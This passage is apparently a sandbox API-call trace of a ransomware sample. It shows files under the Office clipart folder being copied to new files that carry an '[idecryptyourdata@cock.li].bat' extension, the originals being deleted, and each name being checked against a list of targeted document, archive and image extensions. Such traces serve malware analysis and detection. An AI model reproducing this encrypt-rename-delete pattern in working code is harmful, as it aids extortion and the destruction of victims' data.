Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0064.378] GetLastError () returned 0x0 [0064.378] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x8d6, lpOverlapped=0x0) returned 1 [0064.380] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x8e0, lpOverlapped=0x0) returned 1 [0064.381] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.381] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0064.381] SetEndOfFile (hFile=0x368) returned 1 [0064.383] CloseHandle (hObject=0x368) returned 1 [0064.384] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.384] SetEndOfFile (hFile=0x2c8) returned 1 [0064.385] CloseHandle (hObject=0x2c8) returned 1 [0064.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.385] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf")) returned 1 [0064.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0064.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0064.388] lstrlenW (lpString=".doc") returned 4 [0064.388] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.388] lstrlenW (lpString=".docx") returned 5 [0064.388] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0064.388] lstrlenW (lpString=".pdf") returned 4 [0064.388] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.388] lstrlenW (lpString=".xls") returned 4 [0064.388] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.388] lstrlenW (lpString=".xlsx") returned 5 [0064.388] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0064.388] lstrlenW (lpString=".ppt") returned 4 [0064.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0064.388] lstrlenW (lpString=".zip") returned 4 [0064.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.388] lstrlenW (lpString=".rar") returned 4 [0064.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.389] lstrlenW (lpString=".bz2") returned 4 [0064.389] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.389] lstrlenW (lpString=".7z") returned 3 [0064.389] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0064.389] lstrlenW (lpString=".dbf") returned 4 [0064.389] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0064.389] lstrlenW (lpString=".1cd") returned 4 [0064.389] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 64 [0064.389] lstrlenW (lpString=".jpg") returned 4 [0064.389] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.395] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.395] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0064.397] GetLastError () returned 0x0 [0064.397] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x73bc, lpOverlapped=0x0) returned 1 [0064.430] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x73c0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x73c0, lpOverlapped=0x0) returned 1 [0064.431] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.432] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.432] SetEndOfFile (hFile=0x350) returned 1 [0064.432] CloseHandle (hObject=0x350) returned 1 [0064.433] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.433] SetEndOfFile (hFile=0x340) returned 1 [0064.434] CloseHandle (hObject=0x340) returned 1 [0064.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.434] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00234_.wmf")) returned 1 [0064.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0064.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0064.452] lstrlenW (lpString=".doc") returned 4 [0064.452] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.452] lstrlenW (lpString=".docx") returned 5 [0064.452] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.452] lstrlenW (lpString=".pdf") returned 4 [0064.452] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.452] lstrlenW (lpString=".xls") returned 4 [0064.452] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.452] lstrlenW (lpString=".xlsx") returned 5 [0064.452] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.452] lstrlenW (lpString=".ppt") returned 4 [0064.452] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0064.452] lstrlenW (lpString=".zip") returned 4 [0064.452] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.452] lstrlenW (lpString=".rar") returned 4 [0064.452] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.452] lstrlenW (lpString=".bz2") returned 4 [0064.452] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.452] lstrlenW (lpString=".7z") returned 3 [0064.452] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0064.452] lstrlenW (lpString=".dbf") returned 4 [0064.452] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0064.452] lstrlenW (lpString=".1cd") returned 4 [0064.453] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00234_.WMF") returned 68 [0064.453] lstrlenW (lpString=".jpg") returned 4 [0064.453] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.468] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.468] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0064.469] GetLastError () returned 0x0 [0064.469] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x318, lpOverlapped=0x0) returned 1 [0064.481] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x320, lpOverlapped=0x0) returned 1 [0064.482] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.482] WriteFile (in: hFile=0x368, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.482] SetEndOfFile (hFile=0x368) returned 1 [0064.482] CloseHandle (hObject=0x368) returned 1 [0064.483] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.483] SetEndOfFile (hFile=0x350) returned 1 [0064.484] CloseHandle (hObject=0x350) returned 1 [0064.484] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00372_.wmf")) returned 1 [0064.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0064.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0064.485] lstrlenW (lpString=".doc") returned 4 [0064.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.485] lstrlenW (lpString=".docx") returned 5 [0064.485] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.485] lstrlenW (lpString=".pdf") returned 4 [0064.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.485] lstrlenW (lpString=".xls") returned 4 [0064.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.485] lstrlenW (lpString=".xlsx") returned 5 [0064.485] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.485] lstrlenW (lpString=".ppt") returned 4 [0064.485] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0064.485] lstrlenW (lpString=".zip") returned 4 [0064.486] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.486] lstrlenW (lpString=".rar") returned 4 [0064.486] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.486] lstrlenW (lpString=".bz2") returned 4 [0064.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.486] lstrlenW (lpString=".7z") returned 3 [0064.486] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0064.486] lstrlenW (lpString=".dbf") returned 4 [0064.486] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0064.486] lstrlenW (lpString=".1cd") returned 4 [0064.486] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0064.486] lstrlenW (lpString=".jpg") returned 4 [0064.486] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.497] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.497] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.499] GetLastError () returned 0x0 [0064.499] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1e94, lpOverlapped=0x0) returned 1 [0064.549] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1ea0, lpOverlapped=0x0) returned 1 [0064.550] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.550] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.550] SetEndOfFile (hFile=0x2c0) returned 1 [0064.550] CloseHandle (hObject=0x2c0) returned 1 [0064.551] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.551] SetEndOfFile (hFile=0x340) returned 1 [0064.552] CloseHandle (hObject=0x340) returned 1 [0064.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf")) returned 1 [0064.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0064.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0064.553] lstrlenW (lpString=".doc") returned 4 [0064.553] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.553] lstrlenW (lpString=".docx") returned 5 [0064.553] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.553] lstrlenW (lpString=".pdf") returned 4 [0064.553] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.553] lstrlenW (lpString=".xls") returned 4 [0064.553] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.553] lstrlenW (lpString=".xlsx") returned 5 [0064.553] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.553] lstrlenW (lpString=".ppt") returned 4 [0064.553] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0064.553] lstrlenW (lpString=".zip") returned 4 [0064.553] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.554] lstrlenW (lpString=".rar") returned 4 [0064.554] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.554] lstrlenW (lpString=".bz2") returned 4 [0064.554] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.554] lstrlenW (lpString=".7z") returned 3 [0064.554] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0064.554] lstrlenW (lpString=".dbf") returned 4 [0064.554] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0064.554] lstrlenW (lpString=".1cd") returned 4 [0064.554] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0064.554] lstrlenW (lpString=".jpg") returned 4 [0064.554] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.554] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.554] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.555] GetLastError () returned 0x0 [0064.555] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2708, lpOverlapped=0x0) returned 1 [0064.563] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2710, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2710, lpOverlapped=0x0) returned 1 [0064.564] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.564] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.564] SetEndOfFile (hFile=0x2c0) returned 1 [0064.564] CloseHandle (hObject=0x2c0) returned 1 [0064.565] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.565] SetEndOfFile (hFile=0x340) returned 1 [0064.566] CloseHandle (hObject=0x340) returned 1 [0064.567] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.567] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00449_.wmf")) returned 1 [0064.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0064.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0064.581] lstrlenW (lpString=".doc") returned 4 [0064.581] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.581] lstrlenW (lpString=".docx") returned 5 [0064.581] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.581] lstrlenW (lpString=".pdf") returned 4 [0064.581] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.581] lstrlenW (lpString=".xls") returned 4 [0064.581] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.581] lstrlenW (lpString=".xlsx") returned 5 [0064.581] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.581] lstrlenW (lpString=".ppt") returned 4 [0064.581] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0064.581] lstrlenW (lpString=".zip") returned 4 [0064.581] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.581] lstrlenW (lpString=".rar") returned 4 [0064.582] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.582] lstrlenW (lpString=".bz2") returned 4 [0064.582] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.582] lstrlenW (lpString=".7z") returned 3 [0064.582] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0064.582] lstrlenW (lpString=".dbf") returned 4 [0064.582] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0064.582] lstrlenW (lpString=".1cd") returned 4 [0064.582] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00449_.WMF") returned 68 [0064.582] lstrlenW (lpString=".jpg") returned 4 [0064.582] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.582] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.582] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.583] GetLastError () returned 0x0 [0064.583] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x600c, lpOverlapped=0x0) returned 1 [0064.594] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x6010, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x6010, lpOverlapped=0x0) returned 1 [0064.596] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.596] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.596] SetEndOfFile (hFile=0x2c0) returned 1 [0064.596] CloseHandle (hObject=0x2c0) returned 1 [0064.597] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.597] SetEndOfFile (hFile=0x340) returned 1 [0064.599] CloseHandle (hObject=0x340) returned 1 [0064.599] SetFileAttributesW 